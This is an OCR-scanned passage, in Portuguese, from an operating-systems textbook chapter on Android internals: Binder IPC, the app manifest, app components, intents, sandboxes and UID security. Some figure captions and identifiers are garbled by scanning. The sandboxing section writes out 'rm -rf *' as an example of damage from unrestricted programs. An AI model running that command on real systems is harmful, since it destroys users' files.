2. BinderProxy constrói uma transação de núcleo e a 
entrega para o núcleo através de uma chamada ioctl. 

3. O núcleo transfere a transação para o processo 
intencionado, entregando-o para um thread que 
está esperando na sua própria chamada ioctl. 

4. A transação é decodificada de volta em uma Par- 
cel e onTransact chamado para o objeto local 
apropriado, aqui Examplelmpl (que é uma sub- 
classe de /Example. Stub). 

5. IExample.Stub decodifica Parcel no método 
apropriado e argumentos para chamada, aqui 
chamando print. 

6. A implementação concreta de print em Exam- 
plelmpl por fim executa. 


A maior parte do IPC do Android é escrita usando esse 
mecanismo. A maioria dos serviços no Android é defini- 
da através do AIDL e implementada como mostrado aqui. 
Lembre-se da Figura 10.40 anterior mostrando como a 
implementação do gerenciador de pacotes no processo 
system server usa o IPC para publicar a si mesmo com o 
gerenciador de serviços para outros processos para fazer 
as chamadas. Duas interfaces de AIDL estão envolvidas 
aqui: uma para o gerenciador de serviços e uma para o ge- 
renciador de pacotes. Por exemplo, a Figura 10.50 mostra 
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print("hello") 


IExample.Stub 





onTransact({print hello}) 


Binder 


























e OR) Interface AIDL básica do gerenciador de serviços. 


package android.os 


interface IServiceManager { 
IBinder getService(String name); 
void addService(String name, IBinder binder); 


a descrição AIDL básica para o gerenciador de serviços; 
ela contém o método getService, que outros processos 
usam para recuperar o /Binder de interfaces do serviço de 
sistema como o gerenciador de pacotes. 


10.8.8 Aplicações para o Android 


O Android fornece um modelo de aplicações que é 
muito diferente do ambiente de linha de comando nor- 
mal no shell do Linux ou mesmo nas aplicações lan- 
çadas a partir da interface do usuário. Uma aplicação 
não é um arquivo executável com um ponto de entrada 
principal; ele é um contêiner de tudo o que forma aque- 
la aplicação: seu código, recursos gráficos, declarações 
sobre o que está no sistema, e outros dados. 

Uma aplicação Android por convenção é um arquivo 
com uma extensão apk, para Android Package. Esse 
arquivo na realidade é um arquivo zip normal, contendo 
tudo sobre a aplicação. Os conteúdos importantes de um 
apk são: 


1. Um manifesto descrevendo o que é a aplicação, o 
que ela faz e como executá-la. O manifesto deve 
fornecer um nome de package para a aplicação, 
uma cadeia de caracteres com escopo no estilo Java 
(como com.android.app.calculator), que identifique 
unicamente ela. 

2. Os recursos necessários pela aplicação, incluindo 
cadeias de caracteres que ela exibe para o usuário, 
dados XML para layouts e outras descrições, ma- 
pas de bits gráficos etc. 

3. O código em si, que pode ser o bytecode Dalvik 
assim como o código nativo de bibliotecas; 

4. Informações de assinatura, identificando com se- 
gurança o autor. 


A parte fundamental da aplicação para nossos fins 
aqui é o seu manifesto, que aparece como um arquivo 
XML pré-compilado chamado AndroidManifest.xml na 
raiz do espaço de nomes zip do apk. Um exemplo com- 
pleto de declaração de manifesto para uma aplicação de 
e-mail hipotética é mostrado na Figura 10.51: ele per- 
mite que você veja e componha e-mails e também inclui 


Capítulo 10 ESTUDO DE CASO 1: UNIX, LINUX E ANDROID | 571 


componentes necessários para a sincronizar seu arma- 
zenamento local de e-mails com um servidor mesmo 
quando o usuário não esteja atualmente na aplicação. 

Aplicações Android não têm um ponto de entrada 
main simples que seja executado quando o usuário as 
inicia. Em vez disso, elas publicam sob a etiqueta do 
manifesto <application> uma série de pontos de entrada 
descrevendo as várias coisas que a aplicação pode fa- 
zer. Esses pontos de entrada são expressos como quatro 
tipos distintos, definindo os tipos centrais de comporta- 
mento que as aplicações podem fornecer: atividade, re- 
ceptor, serviço e provedor de conteúdo. O exemplo que 
apresentamos mostra algumas atividades e uma declara- 
ção dos outros tipos de componentes, mas uma aplica- 
ção pode declarar zero ou mais de qualquer um desses. 

Cada um dos quatro tipos de componentes que uma 
aplicação pode conter tem diferentes semânticas e 
usos dentro do sistema. Em todos os casos, o atributo 
android:name fornece o nome de classe Java do código 
de aplicação implementando aquele componente, que 
será instanciado pelo sistema quando necessário. 

O gerenciador de pacotes é a parte do Android que 
controla todas os pacotes de aplicação. Ele analisa cada 
manifesto das aplicações, coletando e indexando as in- 
formações que encontra nelas. Com essas informações, 
ele então proporciona facilidade para os clientes ques- 
tionarem sobre as aplicações atualmente instaladas e re- 
cuperar informações relevantes sobre elas. Ele também 
é responsável por instalar aplicações (criando espaço de 
armazenamento para a aplicação e assegurando a inte- 
gridade do apk) assim como tudo o que é necessário 
para desinstalar (limpar tudo que seja associado ao apli- 
cativo previamente instalado). 

As aplicações estaticamente declaram seus pontos 
de entrada em seu manifesto, portanto elas não preci- 
sam executar o código no momento da instalação que as 
registra com o sistema. Esse design torna o sistema mais 
robusto de muitas maneiras: instalar uma aplicação não 
exige executar código de aplicação, as capacidades de 
alto nível da aplicação sempre podem ser determinadas 
examinando o manifesto, não há necessidade de manter 
um banco de dados separado dessa informação sobre a 
aplicação que pode sair de sincronia (como através de 
atualizações) com as capacidades reais da aplicação, e 
ele garante que nenhuma informação sobre uma apli- 
cação pode ser deixada após ela ser desinstalada. Essa 
abordagem decentralizada foi tomada para evitar mui- 
tos desses tipos de problemas causados pelo Registro 
centralizado do Windows. 

Dividir uma aplicação em componentes de granu- 
laridade mais fina também serve a nosso propósito de 
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(FIGURA 10.51 | Estrutura básica do AndroidManifest.xml. 


<?xml version="1.0" encoding="utf-8"?> 


<manifest xmins:android="http://schemas.android.com/apk/res/android" 


package="com.example.email"> 
<application> 


<activity android:name="com.example.email.MailMainActivity"> 


<intent-filter> 


<action android:name="android.intent.action. MAIN" /> 
<category android:name="android.intent.category.LAUNCHER" /> 


</intent-filter> 
</activity> 


<activity android:name="com.example.email.ComposeActivity"> 


<intent-filter> 


<action android:name="android.intent.action. SEND" /> 
<category android:name="android.intent.category. DEFAULT" /> 


<data android:mimeType="*/*" /> 


</intent-filter> 
</activity> 


<service android:name="com.example.email.SyncService"> 


</service> 


<receiver android:name="com.example.email. SyncControlReceiver"> 


<intent-filter> 


<action android:name="android.intent.action. DEVICE. STORAGE. LOW" /> 


</intent-filter> 
<intent-filter> 


<action android:name="android.intent.action. DEVICE STORAGE OKAY" /> 


</intent-filter> 
</receiver> 


«provider android:name="com.example.email.EmailProvider" 
android:authorities="com.example.email.provider.email'> 


</provider> 


</application> 
</manifest> 


apoiar a interoperação e colaboração entre aplicações. 
Aplicações podem publicar fragmentos de si mesmas 
que fornecem funcionalidades específicas, que outras 
aplicações podem fazer uso seja direta ou indiretamen- 
te. Isso será ilustrado à medida que examinarmos com 
mais detalhes os quatro tipos de componentes que po- 
dem ser publicados. 

Acima do gerenciador de pacotes encontra-se outro ser- 
viço importante do sistema, o gerenciador de atividades. 
Enquanto o gerenciador de pacotes é responsável por man- 
ter a informação estática a respeito de todas as aplicações 
instaladas, o gerenciador de atividades determina quando, 
onde e como essas aplicações devem ser executadas. Ape- 
sar do nome, ele na realidade é responsável por executar 
todos os quatro tipos de componentes de aplicação e im- 
plementar o comportamento adequado para cada um deles. 


Atividades 


Uma atividade é uma parte da aplicação que intera- 
ge diretamente com o usuário por meio de uma interface 
de usuário. Quando o usuário lança uma aplicação so- 
bre o seu dispositivo, isso é na realidade uma atividade 
dentro da aplicação que foi designada como um ponto 
de entrada principal. A aplicação implementa o código 
nessa atividade que é responsável por interagir com o 
usuário. 

O exemplo do manifesto de e-mail mostrado na Fi- 
gura 10.51 contém duas atividades. A primeira é a prin- 
cipal interface do usuário de correio, permitindo que os 
usuários vejam suas mensagens; a segunda é uma inter- 
face em separado para compor a nova mensagem. A pri- 
meira atividade de correio é declarada como o principal 


ponto de entrada para a aplicação, isto é, a atividade que 
será inicializada quando o usuário a lançar da tela home. 

Como a primeira atividade é a principal, ela será mos- 
trada para os usuários como um aplicativo que eles podem 
lançar do lançador de aplicativos principal. Se eles fize- 
rem isso, 0 sistema estará no mesmo estado mostrado na 
Figura 10.52. Aqui o gerenciador de atividades, do lado 
esquerdo, fez uma instância de ActivityRecord interna em 
seu processo para controlar a atividade. Uma ou mais des- 
sas atividades são organizadas em contêineres chamados 
tasks, que correspondem mais ou menos ao que o usuário 
experimenta como um aplicativo. Nesse ponto, o geren- 
ciador de atividades começou o processo de aplicação 
do e-mail e uma instância do seu MainMailActivity para 
exibir seu UI principal, que está associado com Activi- 
tyRecord apropriado. Essa atividade está em um estado 
chamado retomada (resumed), tendo em vista que ela está 
agora no primeiro plano da interface do usuário. 

Se o usuário fosse agora trocar do aplicativo de e-mail 
(sem deixá-lo) e lançar um aplicativo de câmera para tirar 
uma foto, estaríamos no mesmo estado mostrado na Fi- 
gura 10.53. Observe que agora temos um novo processo 
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de câmera executando a principal atividade da câmera, 
um ActivityRecord associado por ele no gerenciador de 
atividades, e agora é a atividade retomada. Algo interes- 
sante também acontece à atividade de e-mail anterior: em 
vez de ser retomado, ele agora é parado e o ActivityRe- 
cord segura o estado salvo dessa atividade. 

Quando uma atividade não está mais em primeiro 
plano, o sistema pede a ela para “salvar seu estado”. Isso 
envolve a aplicação criar uma quantidade mínima de in- 
formação do estado representando o que o usuário vê 
atualmente, que ela retorna ao gerenciador de atividades 
e armazena no processo system server, no ActivityRecord 
associado com aquela atividade. O estado salvo para uma 
atividade geralmente é pequeno, contendo, por exemplo, 
onde você se encontra em uma mensagem de e-mail, mas 
não a mensagem em si, que será armazenada em outra par- 
te pelo aplicativo em seu armazenamento persistente. 

Lembre-se de que embora o Android faça a pagina- 
ção por demanda (ele pode paginar para dentro e para 
fora RAM limpa que foi mapeada de arquivos no dis- 
co, como códigos), ele não recorre ao espaço de troca. 
Isso significa que todas as páginas sujas da RAM em um 


[FIGURA 10.52] Começando uma atividade principal de uma aplicação de e-mail. 
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les LR] Começando a aplicação de câmera após o e-mail. 
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processo de aplicação têm de ficar na RAM. Ter o estado 
da principal atividade do e-mail seguramente armazena- 
do no gerenciador de atividades devolve ao sistema parte 
da flexibilidade em lidar com a memória que a troca de 
memória proporciona. 

Por exemplo, se o aplicativo da câmera começa a 
exigir muita RAM, o sistema pode simplesmente li- 
vrar-se do processo de e-mail, como mostrado na Fi- 
gura 10.54. O ActivityRecord, com seu precioso estado 
salvo, segue seguramente escondido pelo gerenciador 
de atividades no processo do system server. Tendo em 
vista que o processo do system server hospeda todos 
os serviços centrais de sistema do Android, ele deve 
sempre seguir executando, de maneira que o estado 
salvo aqui permanecerá por tanto tempo quanto for 
necessário. 

Nosso aplicativo de e-mail de exemplo não apenas tem 
uma atividade para sua UI principal, mas inclui outro Com- 
poseActivity. Aplicativos podem declarar qualquer número 
de atividades que quiserem. Isso pode ajudar a organizar a 
implementação de um aplicativo, mas de maneira mais im- 
portante, ele pode ser usado para implementar interações 
entre aplicações. Por exemplo, essa é a base do sistema 
de compartilhamento entre aplicações do Android, que o 
ComposeActivity aqui está participando. Se a usuária, no 
aplicativo da câmera, decide que quer compartilhar uma 
foto que ela tirou, nosso ComposeActivity do aplicativo do 
e-mail é uma das opções de compartilhamento que ela tem. 
Se for escolhida, aquela atividade será inicializada e dada 
a foto a ser compartilhada. (Mais tarde veremos como o 
aplicativo da câmera é capaz de encontrar o aplicativo do 
e-mail ComposeActivity.) 


Realizar essa opção de compartilhamento enquanto 
no estado de atividade visto na Figura 10.54 vai levar ao 
novo estado na Figura 10.55. Há uma série de questões 
importantes a serem observadas: 


1. O processo do aplicativo de e-mail deve ser 
inicializado novamente, para executar o seu 
ComposeActivity. 

2. No entanto, o antigo MailMainActivity não é ini- 
cializado nesse ponto, tendo em vista que ele não 
é necessário. Isso reduz o uso da RAM. 

3. A tarefa da câmera agora tem dois registros: o ori- 
ginal CameraMainActivity no qual acabamos de 
estar, e o novo ComposeActivity que está agora em 
exibição. Para o usuário, essas são ainda uma tare- 
fa coesa: trata-se da câmera atualmente interagin- 
do com eles para enviar uma foto por e-mail. 

4. O novo ComposeAtivity está no topo, então ele 
é retomado; o CameraMainActivity anterior 
não está mais no topo, então o seu estado foi 
salvo. Podemos neste ponto seguramente sair 
deste processo se essa RAM for necessária em 
outra parte. 


Por fim, vamos examinar o que aconteceria se o usu- 
ário deixasse a tarefa da câmera enquanto nesse último 
estado (isto é, compondo um e-mail para compartilhar 
uma foto) e retornasse ao aplicativo de e-mail. A Figura 
10.56 mostra o novo estado que o sistema se encontra- 
rá. Observe que trouxemos a tarefa do e-mail com sua 
atividade principal de volta para o primeiro plano. Isso 
torna MailMainActivity a atividade de primeiro plano, 
mas atualmente não há uma instância dele executando 
no processo do aplicativo. 


AUTELE Removendo o processo de e-mail para recuperar RAM para a câmera. 
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e TEE Compartilhando uma foto da câmera através da aplicação de e-mail. 
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eit OR] Retornando ao aplicativo de e-mail. 
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Para retornar à atividade anterior, o sistema faz uma qualquer posição de rolamento ou outro estado de inter- 
nova instância, devolvendo-a para o estado salvo anterior face do usuário que tenha sido salvo. 
que a antiga instância forneceu. Essa ação de recuperar 
uma atividade do seu estado salvo deve ser capaz de tra- 
zer a atividade de volta ao mesmo estado visual que o 
usuário a deixou pela última vez. Para conseguir isso, o 
aplicativo examinará no seu estado salvo pela mensagem 
em que o usuário estava, carregará os dados dessa mensa- 1. Pode ser uma operação autocontida de segundo 
gem do seu armazenamento persistente, e então aplicará plano de longa execução. Exemplos comuns da 


Serviços 


Um serviço tem duas identidades distintas: 
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utilização de serviços dessa maneira são produzir 
uma música em segundo plano, manter uma co- 
nexão de rede ativa (como com um servidor IRC) 
enquanto o usuário está em outros aplicativos, 
baixar ou enviar dados em segundo plano etc. 

2. Ele pode servir como um ponto de conexão para 
outros aplicativos ou o sistema para desempenhar 
uma interação rica com o aplicativo. Isso pode 
ser usado por aplicativos para fornecer APIs se- 
guras para outros aplicativos, como para realizar 
processamento de imagem ou áudio, fornecer um 
texto para fala etc. 


O exemplo do manifesto de e-mail mostrado na Fi- 
gura 10.51 contém um serviço que é usado para realizar 
a sincronização da caixa de correio do usuário. Uma 
implementação comum escalonaria o serviço a ser exe- 
cutado em um intervalo regular, como a cada 15 minu- 
tos, inicializando o serviço quando fosse o momento de 
executá-lo e parando quando tivesse terminado. 

Esse é o uso típico do primeiro estilo de serviço, uma 
longa operação de segundo plano. A Figura 10.57 mostra 
o estado do sistema nesse caso, que é bastante simples. 
O gerenciador de atividades criou ServiceRecord para ter 
controle do serviço, observando que ele foi inicializado, 
e desse modo criou sua instância SyncService no proces- 
so da aplicativo. Embora nesse estado o serviço esteja 
completamente ativo (barrando o sistema inteiro de ir 
dormir se não estiver segurando uma trava de despertar) 
e livre para fazer o que quiser. É possível para o processo 
da aplicação sair enquanto nesse estado, tal como se o 
processo quebrar, mas o gerenciador de atividades conti- 
nuará a manter o seu ServiceRecord e pode a essa altura 
decidir reinicializar o serviço se assim desejar. 


(cj RSA Começando um serviço de aplicação. 


Processo gerenciador de atividades system server 





Pd 
/ 


I 

i ServiceRecord 
! ; (SyncService) 
l 







Para ver como você poderia usar um serviço como 
um ponto de conexão para interação com outros apli- 
cativos, vamos dizer que queremos estender nosso 
SyncService para ter uma API que permita que outros 
aplicativos controlem seu intervalo de sincronia. Pre- 
cisaremos definir uma interface AIDL para esse API, 
como mostrado na Figura 10.58. 

Para usar isso, outro processo pode ligar-se (bind) ao 
nosso serviço do aplicativo, conseguindo acesso à sua in- 
terface. Isso cria uma conexão entre os dois aplicativos, 
mostrada na Figura 10.59. Os passos desse processo são: 


1. O aplicativo cliente diz ao gerenciador de proces- 
sos que ele gostaria ligar-se ao serviço; 

2. Se o serviço ainda não tiver sido criado, o geren- 
ciador de atividades o cria no processo do serviço 
do aplicativo. 

3. O serviço retorna o /Binder para sua interface de 
volta para o gerenciador de atividades, que agora 
segura aquele /Binder no seu ServiceRecord. 

4. Agora que o gerenciador de atividades tem o 
IBinder do serviço, ele pode ser enviado de volta 
para o aplicativo cliente original. 

5. O aplicativo cliente agora com o [Binder do ser- 
viço em mãos pode proceder para fazer quais- 
quer chamadas diretas que ele gostaria na sua 
interface. 


Receptores 


Um receptor é o recipiente de eventos (tipica- 
mente externos) que acontecem geralmente no se- 
gundo plano e fora da interação do usuário normal. 
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(cj LR: Interface para controlar um intervalo sync de um serviço sync. 


package com.example.email 


interface ISyncControl { 
int getSyncinterval(); 
void setSynclnterval(int seconds); 


leia Ba] Ligando (binding) em um serviço de aplicativo. 
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Receptores conceitualmente são os mesmos que um 
aplicativo registrando para um call-back quando algo 
interessante acontece (um alarme dispara, mudan- 
ças na conectividade de dados etc.), mas não exigem 
que a aplicação esteja executando a fim de receber o 
evento. 

O exemplo do manifesto de e-mail mostrado na Fi- 
gura 10.51 contém um receptor para o aplicativo para 
descobrir quando o armazenamento do dispositivo se 
torna baixo para que ele pare de sincronizar o e-mail 
(que pode consumir mais armazenamento). Quando o 
armazenamento do dispositivo torna-se baixo, o sistema 
enviará uma transmissão a todos (broadcast) com o có- 
digo de armazenamento baixo, para ser entregue a todos 
os receptores interessados no evento. 

A Figura 10.60 ilustra como uma transmissão dessas 
é processada pelo gerenciador de atividades a fim de en- 
tregá-la aos receptores interessados. Ela primeiro pede 
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ao gerenciador de pacotes por uma lista de todos os re- 
ceptores interessados no evento, que é colocado em um 
Broadcast-Record representando aquela transmissão. O 
gerenciador de atividades procederá então para passar 
por cada entrada na lista, fazendo que cada processo do 
aplicativo associado crie e execute a classe de receptor 
adequada. 

Os receptores apenas executam como operações 
de execução única. Quando um evento acontece, o 
sistema encontra quaisquer receptores interessados, 
entrega-lhes o evento, e uma vez que eles tenham 
consumido o evento, eles estão finalizados. Não há 
ReceiveRecord como aqueles que vimos para outros 
componentes de aplicações, pois um receptor em par- 
ticular é apenas uma entidade transitória pela duração 
de uma única recepção. Cada vez que uma nova trans- 
missão é enviada para um componente do receptor, é 
criada uma nova instância da classe daquele receptor. 


eit TE Enviando uma transmissão para receptores de aplicação. 
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Provedores de conteúdo 


Nosso último componente de aplicação, o provedor 
de conteúdo, é um mecanismo fundamental que as apli- 
cações usam para trocar dados umas com as outras. To- 
das as interações com o provedor de conteúdo são através 
de URIs usando um conteúdo: esquema; a autoridade do 
URI é usada para descobrir a implementação de provedor 
de conteúdo certa para interagir. 

Por exemplo, em nossa aplicação de e-mail da Fi- 
gura 10.51, o provedor de conteúdo especifica que sua 
autoridade é com.example.email.provider.email. Desse 
modo, URIs operando nesse provedor de conteúdo co- 
meçariam com 


content://com.example.email.provider.email/ 


O sufixo para aquela URI é interpretado pelo próprio 
provedor para determinar quais dados dentro dele estão 
sendo acessados. Neste exemplo, uma convenção co- 
mum seria que a URI 


content://com.example.email.provider.email/ 
messages 


significa a lista de todas as mensagens de e-mail, 
enquanto 


content://com.example.email.provider.email/ 
messages/1 


fornece acesso a uma única Mensagem na chamada de 
número 1. 

Para interagir com um provedor de conteúdo, as 
aplicações sempre passam por uma API de sistema cha- 
mada ContentResolver, em que a maioria dos métodos 
tem um argumento de URI inicial indicando os dados 
para operar. Um dos métodos de ContentResolver mais 
comumente usados é query, que realiza uma consulta de 
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banco de dados de uma determinada URI e retorna um 
Cursor para recuperar os resultados estruturados. Por 
exemplo, recuperar um resumo de todas as mensagens 
de e-mail disponíveis se pareceria com algo como: 


query(“content://com.example.email.provider.email/ 
messages”) 


Embora isso não pareça assim para as aplicações, o 
que realmente está acontecendo quando elas usam pro- 
vedores de conteúdo tem muitas similaridades com a 
ligação (binding) com serviços. A Figura 10.61 ilustra 
como o sistema lida com nosso exemplo de consulta: 


1. A aplicação chama ContentResolver.query para 
iniciar a operação. 

2. A autoridade do URI é passada para o gerencia- 
dor de atividades para que ele encontre (através 
do gerenciador de pacotes) o provedor de conteu- 
do apropriado. 

3. Se o provedor de conteúdo já não estiver execu- 
tando, ele é criado. 

4. Uma vez criado, o provedor de conteúdo retor- 
na sua Binder para o gerenciador de atividades 
implementando a interface [ContentProvider do 
sistema. 

5. O Binder do provedor de conteúdo é retornado 
para o ContentResolver. 

6. Oresolvedor de conteúdo pode agora completar a 
operação query inicial chamando o método apro- 
priado na interface AIDL, retornando o resultado 
Cursor. 


Provedores de conteúdo são um dos mecanismos 
fundamentais para realizar interações através de apli- 
cações. Por exemplo, se retornarmos ao sistema de 
compartilhamento entre aplicações descrito anterior- 
mente na Figura 10.55, os provedores de conteúdo são 
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a maneira que os dados são realmente transferidos. Um 
fluxo completo para essa operação é: 


1. Uma solicitação de pedido que inclua o URI dos 
dados a serem compartilhados é criada e é sub- 
metida ao sistema. 

2. O sistema pede ao ContentResolver pelo tipo 
MIME dos dados por trás daquela URI; isso fun- 
ciona de maneira muito semelhante ao método 
query que discutimos há pouco, mas pede ao pro- 
vedor de conteúdo para retornar a cadeia do tipo 
MIME para o URI. 

3. O sistema encontra todas as atividades que po- 
dem receber dados do tipo MIME identificado. 

4. Uma interface de usuário é mostrada para o usu- 
ário para escolher um dos recipientes possíveis. 

5. Quando uma das atividades for selecionada, o 
sistema a lança. 

6. A atividade de tratamento de compartilhamento 
recebe o URI dos dados a serem compartilhados, 
recupera seus dados através do ContentResolver, 
e realiza sua operação apropriada: cria um e-mail, 
armazena-o etc. 


10.8.9 Intento 


Um detalhe que ainda não discutimos no manifesto 
de aplicação mostrado na Figura 10.51 são as etiquetas 
<intent filter> incluídas com as atividades e declarações 
do recebedor. Elas fazem parte da característica de in- 
tento no Android, que é a pedra fundamental para como 
aplicações diferentes identificam umas às outras a fim 
de serem capazes de interagir e trabalhar juntas. 

Um intento é o mecanismo que o Android usa para 
descobrir e identificar atividades, receptores e servi- 
ços. Ele é similar em algumas maneiras ao caminho de 
busca do shell do Linux, que o shell usa para procurar 
através de múltiplos diretórios possíveis a fim de en- 
contrar nomes de comandos equivalentes executáveis 
dados a ele. 

Há dois tipos principais de intentos: explícito e im- 
plícito. Um intento explícito é aquele que identifica 
diretamente um único componente de aplicação espe- 
cífico; em termos do shell do Linux, ele é equivalen- 
te a fornecer um caminho absoluto a um comando. A 
parte mais importante de um intento assim é um par 
de cadeias de caracteres nomeando o componente: 
o package name da aplicação-alvo e classe name do 
componente dentro da aplicação. Agora, retornando à 
atividade da Figura 10.52 na aplicação Figura 10.51, 
um intento explícito para esse componente seria um 
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com o nome de pacote com.example.email e nome de 
classe com.example.email. MailMainActivity. 

O nome de classe e pacote de um intento explícito 
são informações suficientes para identificar unicamente 
um componente-alvo, como a atividade de e-mail prin- 
cipal na Figura 10.52. A partir do nome do pacote, o 
gerenciador de pacotes pode retornar tudo o que for ne- 
cessário a respeito da aplicação, como onde encontrar 
o seu código. A partir do nome de classe, sabemos qual 
parte daquele código executar. 

Um intento implícito é aquele que descreve carac- 
terísticas do componente desejado, mas não do com- 
ponente em si; em termos de shell do Linux, isso é o 
equivalente a fornecer uma única linha de comando ao 
shell, que ele usa com seu caminho de pesquisa para 
encontrar um comando concreto a ser executado. Esse 
processo de encontrar o componente que pareie com um 
intento implícito é chamado resolução de intento. 

O mecanismo de compartilhamento geral do An- 
droid, como vimos na ilustração da Figura 10.55 do 
compartilhamento da foto que uma usuária tirou de sua 
câmera através da aplicação de e-mail, é um bom exem- 
plo de intentos implícitos. Aqui a aplicação da câmera 
constrói um intento descrevendo a ação a ser feita, e o 
sistema encontra todas as atividades que têm potencial 
para realizar aquela ação. Um compartilhamento é soli- 
citado por meio da ação de intento android.intent.action. 
SEND, e podemos ver na Figura 10.51 que a atividade 
compose declara que ela pode realizar essa ação. 

Pode haver três resultados de uma resolução de inten- 
to: (1) nenhum pareamento é encontrado, (2) um único 
pareamento é encontrado ou (3) há múltiplas atividades 
que podem lidar com o intento. Um pareamento vazio 
dará um resultado vazio ou uma exceção, dependendo 
das expectativas do chamador a essa altura. Se o pare- 
amento for único, então o sistema pode imediatamente 
proceder para lançar o agora intento explícito. Se o pa- 
reamento não for único, precisamos de alguma maneira 
solucioná-lo de outro modo para um único resultado. 

Se o intento for resolvido para múltiplas atividades 
possíveis, não podemos simplesmente lançar todas elas; 
precisamos escolher um único intento a ser lançado. 
Isso é conseguido através de um truque no gerenciador 
de pacotes. Se for pedido a ele que solucione um inten- 
to em uma única atividade, mas ele descobrir que há 
múltiplos pareamentos, em vez disso ele resolve o in- 
tento para uma atividade especial construída no sistema 
chamada de Resolver Activity. Essa atividade, quando 
lançada, apenas pega o intento original, pede ao geren- 
ciador de pacotes uma lista de todas as atividades pare- 
adas e as exibe para o usuário para selecionar uma única 
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ação desejada. Quando uma for selecionada, ele cria um 
novo intento explícito a partir do intento original e a ati- 
vidade selecionada, chamando o sistema para ter aquela 
nova atividade inicializada. 

O Android tem outra similaridade com o shell do Li- 
nux: no shell gráfico do Android, o lançador, executa no 
espaço do usuário como qualquer outra aplicação. Um 
lançador Android realiza chamadas no gerenciador de 
pacotes para descobrir atividades disponíveis e lançá- 
-las quando selecionado pelo usuário. 


10.8.10 Caixas de areia de aplicações 


Como é tradicional em sistemas operacionais, as 
aplicações são vistas como códigos executando como 
o usuário, em prol do usuário. Esse comportamento foi 
herdado da linha de comando, onde você executa o co- 
mando Is e espera que ele execute com sua identidade 
(UID), com os mesmos direitos de acesso que você tem 
no sistema. Da mesma maneira, quando você usa uma 
interface de usuário gráfica para lançar um jogo que 
quer jogar, aquele jogo vai efetivamente executar com 
sua identidade, com acesso a seus arquivos e muitas ou- 
tras coisas de que ele talvez não precise realmente. 

Não é assim, no entanto, como usamos os computa- 
dores na maior parte das vezes hoje em dia. Executamos 
aplicações que adquirimos de alguma fonte terceira menos 
confiável, que tem funcionalidades de varredura, que fará 
uma ampla gama de coisas diferentes em seu ambiente so- 
bre o qual temos pouco controle. Há uma desconexão entre 
o modelo de aplicação suportado pelo sistema operacional 
e o que está realmente em uso. Isso pode ser mitigado por 
estratégias como distinguir entre privilégios do usuário 
normais e “administrativos” e avisos da primeira vez que 
estiverem executando uma aplicação, mas esses não abor- 
dam realmente a desconexão subjacente. 

Em outras palavras, sistemas operacionais tradicio- 
nais são muito bons em proteger os usuários de outros 
usuários, mas não em proteger usuários de si mesmos. 
Todos os programas executam com o poder do usuário 
e, se algum deles se comportar mal, ele pode causar todo 
o dano possível. Pense nisto: quanto dano você pode 
causar em, digamos, um ambiente UNIX? Você pode 
vazar todas as informações acessíveis ao usuário. Você 
poderia realizar rm -rf * para dar a você mesmo um belo 
diretório vazio. E se o programa não estiver somente de- 
feituoso, mas também malicioso, ele poderia encriptar 
todos os seus arquivos para obter um resgate por eles. 
Executar tudo com o “poder de você” é perigoso! 

O Android tenta abordar essa questão com uma pre- 
missa fundamental: que uma aplicação é na realidade o 


projetista daquela aplicação executando como um hós- 
pede no dispositivo do usuário. Desse modo, uma apli- 
cação não é confiada com nada sensível que não seja 
explicitamente aprovado pelo usuário. 

Na implementação do Android, essa filosofia é 
diretamente expressa através dos IDs dos usuários. 
Quando uma aplicação do Android é instalada, um 
novo ID de usuário único do Linux (ou UID) é cria- 
do para ele, e todo o seu código executa como aquele 
“usuário”. Os IDs de usuário do Linux criam assim 
uma caixa de areia para cada aplicação, com sua pró- 
pria área isolada do sistema de arquivos, da mesma 
maneira que eles criam caixas de areia para os usuários 
em um sistema de computador de mesa. Em outras pa- 
lavras, o Android usa uma característica existente no 
Linux, mas de uma maneira nova. O resultado é um 
melhor isolamento. 


10.8.11 Segurança 


A segurança de aplicações no Android gira em torno 
dos UIDs. No Linux, cada processo executa como um 
UID específico, e o Android usa o UID para identifi- 
car e proteger barreiras de segurança. A única maneira 
de interagir através de processos é por meio de algum 
mecanismo IPC, que em geral traz consigo informações 
suficientes para identificar o UID do chamador. O IPC 
Binder explicitamente inclui essa informação em cada 
transação entregue através de processos de maneira que 
um recipiente do IPC pode facilmente pedir pelo UID 
do chamador. 

O Android predefine uma série de UIDs padrão 
para as partes de nível mais baixo do sistema, mas a 
maioria das aplicações é dinamicamente designada 
um UID, na primeira inicialização ou momento da 
instalação, de uma gama de “UIDs de aplicação”. A 
Figura 10.62 ilustra alguns mapeamentos comuns de 
valores de UID para seus significados. UIDs abaixo 
de 10000 são designações fixas dentro do sistema para 
hardwares dedicados ou outras partes específicas da 
implementação; alguns valores típicos nessa faixa são 
mostrados aqui. Na faixa 10000-19999 estão os UIDs 
designados dinamicamente para aplicações pelo geren- 
ciador de pacotes quando ele os instala; isso significa 
que no máximo 10000 aplicações podem ser instaladas 
no sistema. Também observe que a faixa começando 
em 100000, que é usada para implementar um modelo 
multiusuário tradicional para o Android: uma aplica- 
ção que é concedida o UID 10002 como sua identida- 
de seria identificada como 110002 quando executando 
como um segundo usuário. 


e TENYA Designações UID comuns no Android. 
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UID Propósito 
0 Root 
1000 Sistema central (processo system server) 
1001 Serviços de telefonia 
1013 Processos de mídia de baixo nível 
2000 Acesso ao shell da linha de comando 
10000-19999 | UIDs de aplicação designados dinamicamente 
100000 Início de usuários secundários 








Quando uma aplicação é designada pela primeira vez 
um UID, um novo diretório de armazenamento é cria- 
do para ela, com os arquivos ali de propriedade de sua 
UID. A aplicação recebe acesso livre para seus arquivos 
privados ali, mas não pode acessar os arquivos de ou- 
tras aplicações, tampouco podem outras aplicações to- 
car seus próprios arquivos. Isso torna os provedores de 
conteúdo, como discutido na seção anterior sobre apli- 
cações, especialmente importantes, à medida que eles 
são uns dos poucos mecanismos que podem transferir 
dados entre aplicações. 

Mesmo o próprio sistema, executando como UID 
1000, não pode tocar os arquivos das aplicações. Essa 
é a razão por que o daemon installd existe: ele execu- 
ta com privilégios especiais para ser capaz de acessar 
e criar arquivos e diretórios para outras aplicações. Há 
uma API muito restrita que o installd fornece ao geren- 
ciador de pacotes para que ele crie e gerencie diretórios 
de dados de aplicações conforme e necessidade. 

Em seu estado base, as caixas de areia do Android de- 
vem impedir quaisquer interações entre aplicações que 
possam violar a segurança entre elas. Isso pode ser em 
prol da robustez (evitar que um aplicativo quebre outro), 
mas muitas vezes diz respeito ao acesso à informação. 

Considere nosso aplicativo da câmera. Quando o 
usuário tira uma foto, o aplicativo da câmera a arma- 
zena em seu espaço de dados privado. Nenhuma outra 
aplicação pode acessar aqueles dados, que é o que que- 
remos já que as fotos podem representar dados sensíveis 
para a usuária. 

